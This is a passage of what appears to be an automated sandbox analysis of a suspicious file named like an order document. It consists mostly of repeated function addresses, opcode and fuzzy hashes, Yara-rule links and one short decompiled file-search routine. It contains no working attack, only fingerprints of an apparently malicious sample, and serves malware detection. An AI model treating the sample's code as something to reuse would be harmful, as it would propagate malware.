Instruction Fuzzy Hash: 45C19B47E3EB1688E7D3A070A5417A59A80FF27586F21CF1A9836B25F13B1F4B4E0598

Uniqueness

Uniqueness Score: -1.00%

Function 035007B6 Relevance: 1.7, Strings: 1, Instructions: 451COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: c9ec8a134a7202a3f48c4c9cae321e4ae406a49f08e77514d81103377b87bc35
Instruction ID: a13e8b1f04d7a259ba6148b906f850fecd9998c4b2bbbd9eb654bfb851900d9e
Opcode Fuzzy Hash: c9ec8a134a7202a3f48c4c9cae321e4ae406a49f08e77514d81103377b87bc35
Instruction Fuzzy Hash: C3B1AC47E3FB1689E7C3A070A5417A59A80FF27586F21CF1A9836725F13B1F4B8E0498

Uniqueness

Uniqueness Score: -1.00%

Function 035006BC Relevance: 1.7, Strings: 1, Instructions: 449COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: eeff9ecd7a30830d08d5f945a4d320be5d7fe26b5c568d32a4817273d6b07f01
Instruction ID: 0b0560f9f770ea89b95a1e8e868e6bf4025405163f75a97e3bb92c459956952d
Opcode Fuzzy Hash: eeff9ecd7a30830d08d5f945a4d320be5d7fe26b5c568d32a4817273d6b07f01
Instruction Fuzzy Hash: 19B1AC47E3EB1688E7D3A070A5417A59A80FF27586F21CF1A9836725F13B1F4B8E0498

Uniqueness

Uniqueness Score: -1.00%

Function 03500639 Relevance: 1.7, Strings: 1, Instructions: 447COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: da80b5c23c01d114097b38e375a230600ef0bfdf9aabd0158e40c576c8a26fa2
Instruction ID: 8b0e2fce8ba6ad1ca508a952d09ed5413db6762b31bfba0b34ccbb74b493ed1b
Opcode Fuzzy Hash: da80b5c23c01d114097b38e375a230600ef0bfdf9aabd0158e40c576c8a26fa2
Instruction Fuzzy Hash: 3CB1BC47E3FB1688E7D3A070A5417A19A80FF27586F21CF1A9836729F13B1F4B4E0488

Uniqueness

Uniqueness Score: -1.00%

Function 03500748 Relevance: 1.7, Strings: 1, Instructions: 435COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: dc84bc033d8feb93126f3123473f32d86609a25a031d1ab064372ccc8511b4bf
Instruction ID: 0cae4b3bdccc1b21ee37b1ebf20934f599db4a90580800c1c65dd353a686eb9c
Opcode Fuzzy Hash: dc84bc033d8feb93126f3123473f32d86609a25a031d1ab064372ccc8511b4bf
Instruction Fuzzy Hash: D4B1AC47E3FB1689E7D3A070A5417A59A80FF27586F21CF1A9836B25F13B1F4B4E0498

Uniqueness

Uniqueness Score: -1.00%

Function 0350078D Relevance: 1.7, Strings: 1, Instructions: 432COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 51960c4754f24aa3dc24e2013cbbb6f771f8c0e56c7697aa50360c77b2681f8c
Instruction ID: 28401e5fe0d3d3578598809457d4a578dac0f219f188f3ca110e9ae2a7d7b9a2
Opcode Fuzzy Hash: 51960c4754f24aa3dc24e2013cbbb6f771f8c0e56c7697aa50360c77b2681f8c
Instruction Fuzzy Hash: 8AA19C47E3EB1689E7C3A070A5417A59A80FF27586F21CF1A9836B25F13B1F4B4E0598

Uniqueness

Uniqueness Score: -1.00%

Function 03500789 Relevance: 1.7, Strings: 1, Instructions: 427COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: b98d52b5b879f43aa4ead25c1a297504167c464f81cde5de859dd95ccd08d91b
Instruction ID: 2805beeb39d49b7822d7c7e6681d2d6a3b0c30a9d91347ad52aa0518d1a84f16
Opcode Fuzzy Hash: b98d52b5b879f43aa4ead25c1a297504167c464f81cde5de859dd95ccd08d91b
Instruction Fuzzy Hash: 9CB19E47E3EB1689E7C3A070A5417A59680FF27586F21CF1A9836B29F13B1F4B4E0598

Uniqueness

Uniqueness Score: -1.00%

Function 03500831 Relevance: 1.7, Strings: 1, Instructions: 413COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 86feba2e7d917854002bfe409e4d3b721546a00aa78ea8f13bbeaca16ebe4700
Instruction ID: 99c853d0b42a2ef8a808d98eda58392cadfd54c066567c9c127de11d8823a97c
Opcode Fuzzy Hash: 86feba2e7d917854002bfe409e4d3b721546a00aa78ea8f13bbeaca16ebe4700
Instruction Fuzzy Hash: 75A1BC47E3EB1688E7C3B070A5417A59A80FF27586F61CF1A9836729F13B1F4B4E0498

Uniqueness

Uniqueness Score: -1.00%

Function 03501B05 Relevance: 1.7, Strings: 1, Instructions: 403COMMON

Download Yara Rule

Strings

Y , xrefs: 03501B07

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: Y
API String ID: 0-31907262
Opcode ID: 6d818a2d03d2629ed243238f35b2589b9faa66b98daa3d38a9596c48cab252b0
Instruction ID: cd42b3644114606fe743ec5471d73319e8d5b31fef0f1ef1d7b2687b2799c2fb
Opcode Fuzzy Hash: 6d818a2d03d2629ed243238f35b2589b9faa66b98daa3d38a9596c48cab252b0
Instruction Fuzzy Hash: FFA1DC86E2E71985E783B070E1497E95B94FF13282F218F5A8C27B05F2771B4B8E04C5

Uniqueness

Uniqueness Score: -1.00%

Function 03500862 Relevance: 1.7, Strings: 1, Instructions: 401COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 146f97e209ad8c4966a67e81a3e253062782b1bd9f1088197c20e33e0281b775
Instruction ID: ee4825288b32b4394781d86c1e5af171bbf3cf361bd6b616133b3feaac729d9e
Opcode Fuzzy Hash: 146f97e209ad8c4966a67e81a3e253062782b1bd9f1088197c20e33e0281b775
Instruction Fuzzy Hash: 24A1AC47E3EB1689E7C3B070A1417A59A80FF27586F61CF1A9836B25F13B1F4B4E0498

Uniqueness

Uniqueness Score: -1.00%

Function 035079D3 Relevance: 1.6, Strings: 1, Instructions: 382COMMON

Download Yara Rule

Strings

h, xrefs: 0350397B

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: 84507b5bb90533c1f380a8306e7d69d68e448b4ec3216134b32e127992cf557d
Instruction ID: 64c3e7d8b39c36a1749ee275b475caa7bc7d2e0272147e06011b7b6812356b55
Opcode Fuzzy Hash: 84507b5bb90533c1f380a8306e7d69d68e448b4ec3216134b32e127992cf557d
Instruction Fuzzy Hash: 16D1867660434ADFCB30DE3489957EA77B2BF49350F95441EDC89EB210D3329A8ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 0350089E Relevance: 1.6, Strings: 1, Instructions: 382COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 98affdf87115cd2385dca46bf3eda724b74f751d96d4a2f5ce956ade701c19c7
Instruction ID: 33924dca24fd68082ff053451025ce84cb3cacc6175444d9861438af0381a1fc
Opcode Fuzzy Hash: 98affdf87115cd2385dca46bf3eda724b74f751d96d4a2f5ce956ade701c19c7
Instruction Fuzzy Hash: 22A1BE4BE3EB1689E7C3B070A5417A59A80FF27592F61CF1A9836725F13B1F4B4E0498

Uniqueness

Uniqueness Score: -1.00%

Function 035008D8 Relevance: 1.6, Strings: 1, Instructions: 379COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 92e54bb5b7f044a8d9d3f9f0bf945448cb2a31103e0582968c923a7b72ba6abd
Instruction ID: a7d79eaad6c0345ae4b363a150616971c52d5a04ddf31673f90f816eb4a8dc5c
Opcode Fuzzy Hash: 92e54bb5b7f044a8d9d3f9f0bf945448cb2a31103e0582968c923a7b72ba6abd
Instruction Fuzzy Hash: 4F91AC47E3EB1689E7C3B070A5417A59A80FF27586F21CF1A9836B25F13B1F4B4E0488

Uniqueness

Uniqueness Score: -1.00%

Function 0350095B Relevance: 1.6, Strings: 1, Instructions: 364COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: f36ed1191217ac7782cf7fee34f0c3c83458a07fd5a28c032fba906be930ef53
Instruction ID: c42a784996f0797a12bdc6343422107fbdeac6faf6a968149d3093c950ca1b67
Opcode Fuzzy Hash: f36ed1191217ac7782cf7fee34f0c3c83458a07fd5a28c032fba906be930ef53
Instruction Fuzzy Hash: 98919A4BE3FB1689E7C3A070A1417A59680FF27582F61CF5A9836725F13B1F4B4E0588

Uniqueness

Uniqueness Score: -1.00%

Function 0350091D Relevance: 1.6, Strings: 1, Instructions: 364COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: ebb8fa2d88c5bdbf44536eb0cfaf960b67a93f7773ac800f7b1553f973879602
Instruction ID: 5a497ad7c1cb164f7d80d7363554471ee67345beae058816952decbcd07ee400
Opcode Fuzzy Hash: ebb8fa2d88c5bdbf44536eb0cfaf960b67a93f7773ac800f7b1553f973879602
Instruction Fuzzy Hash: 1991AC47E3FB1689E7D3A070A1417A59A80FF27582F61CF5A9836B25F13B1F4B4E0588

Uniqueness

Uniqueness Score: -1.00%

Function 03500B00 Relevance: 1.6, Strings: 1, Instructions: 355COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 6c275b27e48253624448ef36c9849243334c810c9d92131952afa217420d5049
Instruction ID: a8a65d75d9c26df65afadaac63e789bdf51682a7dfe4e739280b7b86c0cf600a
Opcode Fuzzy Hash: 6c275b27e48253624448ef36c9849243334c810c9d92131952afa217420d5049
Instruction Fuzzy Hash: DD819C4BE3FB1689E7C3A070A1417A59680FF27686F61CF5A9836725F13B1F4B8E0494

Uniqueness

Uniqueness Score: -1.00%

Function 03500A6F Relevance: 1.6, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: cf62dfdc0715cf3af92d898ff2bafd201de667e9c79f08c5ce6af2a2de4a3a64
Instruction ID: 7fac7156681b119429f899c9eba3b682203382d45c0d1681a4100220b796b287
Opcode Fuzzy Hash: cf62dfdc0715cf3af92d898ff2bafd201de667e9c79f08c5ce6af2a2de4a3a64
Instruction Fuzzy Hash: 7E81AF4BE3FB1689E7C3A070A1417A59680FF27586F61CF5A9836725F13B1F4B4E0494

Uniqueness

Uniqueness Score: -1.00%

Function 03500B43 Relevance: 1.6, Strings: 1, Instructions: 325COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: bfdd29204484b32cd79091b5f3477430f5a7e4d0e318c12f7042393f7aaf8827
Instruction ID: e003c500e2864c6897f241aca58c5f77968d98b4e87b7ecb5844dd4be641eca8
Opcode Fuzzy Hash: bfdd29204484b32cd79091b5f3477430f5a7e4d0e318c12f7042393f7aaf8827
Instruction Fuzzy Hash: 1C71AD4BE3FB5689E7C3A070A1417A59680FF27586F21CF1A9836725F13B1F4B8E0484

Uniqueness

Uniqueness Score: -1.00%

Function 03500BB2 Relevance: 1.6, Strings: 1, Instructions: 323COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: a0e729f98b1ced00c3354d2c700482be4861d5c2e83375b886721cfff099a8a6
Instruction ID: fdda77cf9bc8f458a5381298910cb183dc619365e90f3072fb821a7dde5d5d8a
Opcode Fuzzy Hash: a0e729f98b1ced00c3354d2c700482be4861d5c2e83375b886721cfff099a8a6
Instruction Fuzzy Hash: FB718C4BE3FB5689E7C3A070A1417A59680FF27682F61CF5A9836725F13B1F4B8E0494

Uniqueness

Uniqueness Score: -1.00%

Function 03500ABA Relevance: 1.6, Strings: 1, Instructions: 323COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 9a81e1aa9d099b17a427a0154e9b66cc218c5eee364a5f15d5a800008e78ba30
Instruction ID: 92222561b47270586a09f9f24328bc0af878c49fed91f24bf97b66d9470563ac
Opcode Fuzzy Hash: 9a81e1aa9d099b17a427a0154e9b66cc218c5eee364a5f15d5a800008e78ba30
Instruction Fuzzy Hash: BE817C4BE3FB1689E7C3A070A5417A59680FF27586F61CF5A9836725F13B1F4B8E0484

Uniqueness

Uniqueness Score: -1.00%

Function 03500BED Relevance: 1.6, Strings: 1, Instructions: 309COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 4666bd835183701078e45c48b686259388003b0dc501927674af507b026ee061
Instruction ID: 31e957c1962dd92d75641ab7fdbab8830df1ca174c982577fe9376ec9df08d82
Opcode Fuzzy Hash: 4666bd835183701078e45c48b686259388003b0dc501927674af507b026ee061
Instruction Fuzzy Hash: C3719C4BE3FB5689E7C3A070A1417A59680FF27286F61CF5A9836725F13B1F4B8E0494

Uniqueness

Uniqueness Score: -1.00%

Function 03500C3B Relevance: 1.6, Strings: 1, Instructions: 300COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 34c00866d47f6f0d4cbecdb427436b233705f78e1c3fd4e23f0b4fd2a8d61294
Instruction ID: 1a030bcb0b80dee652985510f185bf0bf438076e0bf645b49250d00689367037
Opcode Fuzzy Hash: 34c00866d47f6f0d4cbecdb427436b233705f78e1c3fd4e23f0b4fd2a8d61294
Instruction Fuzzy Hash: 89617B4BE3FB5689E7C3A070A1417A59680FF27282F61CF5A9836725F13B1F4B8E0494

Uniqueness

Uniqueness Score: -1.00%

Function 03500B8F Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 72f271fa9d33f48d5dcd3333f5ff93adad655cfcaabdcbc06f8162087cfb7e9c
Instruction ID: dbc462f09bc19a3352b30537be78e6e6e54138809b1f073a058f0a341e344ae6
Opcode Fuzzy Hash: 72f271fa9d33f48d5dcd3333f5ff93adad655cfcaabdcbc06f8162087cfb7e9c
Instruction Fuzzy Hash: 5871AE4BE3FB5689E7C3A070A1417A59680FF27586F61CF1A9836725F13B1F4B8E0494

Uniqueness

Uniqueness Score: -1.00%

Function 03500CB6 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: dc4382a89e7898f6fe69d4848a43001a9468f360246143f0f5b1cdac9bb6deac
Instruction ID: 5239ea224629ec7fb37d081632e34a4632ddc438887bc1d105ef08eef4cca650
Opcode Fuzzy Hash: dc4382a89e7898f6fe69d4848a43001a9468f360246143f0f5b1cdac9bb6deac
Instruction Fuzzy Hash: 75616D4BE3BB5289E7C3A070A1417A59680FF27182F61CF5A9836725F13B1F4F8E0495

Uniqueness

Uniqueness Score: -1.00%

Function 004026F8 Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004026F8(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402AC1(2), _t19 - 0x1c8) != 0xffffffff) {
					E00405FF7(__edi, _t6);
					_push(_t19 - 0x19c);
					_push(__esi);
					E00406099();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402710
0x00402724
0x0040272f
0x00402730
0x0040286f
0x00402712
0x00402712
0x00402714
0x00402716
0x00402716
0x00402954
0x00402960

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: c36892e06c5a05a47b1c83c5296ec74ed019d09ea245c2b35f81d61d6accc4a2
Instruction ID: 0159b05a81fb7445ac67952f267e1ed3d95360429fb03f1bd53dceef05a54f2a
Opcode Fuzzy Hash: c36892e06c5a05a47b1c83c5296ec74ed019d09ea245c2b35f81d61d6accc4a2
Instruction Fuzzy Hash: EEF055727041019BC300EBB49948AEEB768DF21324F20017FE285F20C1C7B889469B3A

Uniqueness

Uniqueness Score: -1.00%

Function 03500D5D Relevance: 1.5, Strings: 1, Instructions: 275COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 188537744722af91eb8e1ead29198883ea7049a29630fd86026562a071cdd0aa
Instruction ID: 60d7f279631c449668dd98acb36a78a5a803c22256c9f089d9e0e6461e799749
Opcode Fuzzy Hash: 188537744722af91eb8e1ead29198883ea7049a29630fd86026562a071cdd0aa
Instruction Fuzzy Hash: F151704EE3BB5289E7C3A074A1417A59680FF17282F51CF1A983672AF13B1F4B8E0495

Uniqueness

Uniqueness Score: -1.00%

Function 03500DD0 Relevance: 1.5, Strings: 1, Instructions: 267COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 141729e3f422ff039e8dd49786985a0104e19bc3c23a3c5e117671834acc0d6c
Instruction ID: 2319aa4a4a35f627ccd34a7d2abf52b75d1e9cbfa7e0e785ef30fe268fbcc9d6
Opcode Fuzzy Hash: 141729e3f422ff039e8dd49786985a0104e19bc3c23a3c5e117671834acc0d6c
Instruction Fuzzy Hash: B3515B0BE3EB5689E7D3A074A1417A69680FF17282F61CF1A9836725F13B1F4F8E0495

Uniqueness

Uniqueness Score: -1.00%

Function 03506047 Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

o$., xrefs: 035062DC

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: o$.
API String ID: 0-3181078453
Opcode ID: dafdf3cb4a231ba31544fc292a792a84df94b16f4ac046a5723082a5e838d7ed
Instruction ID: 3fe03563ed5f4ca5d22d33b2a6737b4b99a5a0c4e0b6ed1d6c8074512c4a8e35
Opcode Fuzzy Hash: dafdf3cb4a231ba31544fc292a792a84df94b16f4ac046a5723082a5e838d7ed
Instruction Fuzzy Hash: 9AA176756043498FDF34CE68DCA43DA37A2FF59350F85422ACC899B295D3359A46CB01

Uniqueness

Uniqueness Score: -1.00%

Function 03500E5F Relevance: 1.5, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 60b05d2d967f0db79b5ccf3d8bd3e95d423bb28ea25878c847a01d38113c8b1f
Instruction ID: 9fb31b3cb12bdc3a23531e4657fb14d172a47e83855a2c3c72c925e000cd1c93
Opcode Fuzzy Hash: 60b05d2d967f0db79b5ccf3d8bd3e95d423bb28ea25878c847a01d38113c8b1f
Instruction Fuzzy Hash: 72514D0EE3AB5289E7D3A074A1417A69680FF17282F61CF1A9836725F13B5F4F8E0455

Uniqueness

Uniqueness Score: -1.00%

Function 03506077 Relevance: 1.5, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

o$., xrefs: 035062DC

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: o$.
API String ID: 0-3181078453
Opcode ID: ab2128b04885d1f08d7f23b03b8a9d931206d52441fa4e1a4c49cb52d4630b30
Instruction ID: 127f3653381e05e94f41c36c4252cf3d306125d00e98fadffb68b24cece1307b
Opcode Fuzzy Hash: ab2128b04885d1f08d7f23b03b8a9d931206d52441fa4e1a4c49cb52d4630b30
Instruction Fuzzy Hash: 21A149766047898BDF34CE68DDA43DA37A6FF89360F44413ECC49AB295D7315682CB12

Uniqueness

Uniqueness Score: -1.00%

Function 03500D3A Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

F, xrefs: 0350141A

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 82c06e7f1ca0c68b3e839fcde996aed8f591caa1fb6a425bd14c5f4e0cbca5df
Instruction ID: 997065b4ecff7a20eec8b58146b93cbf256c772d3738c44019812c688307428d
Opcode Fuzzy Hash: 82c06e7f1ca0c68b3e839fcde996aed8f591caa1fb6a425bd14c5f4e0cbca5df
Instruction Fuzzy Hash: 03517C4AE3FB5689E7C3A070A1417A59680FF17282F61CF1A9836729F13B1F4B8E0494

Uniqueness

Uniqueness Score: -1.00%

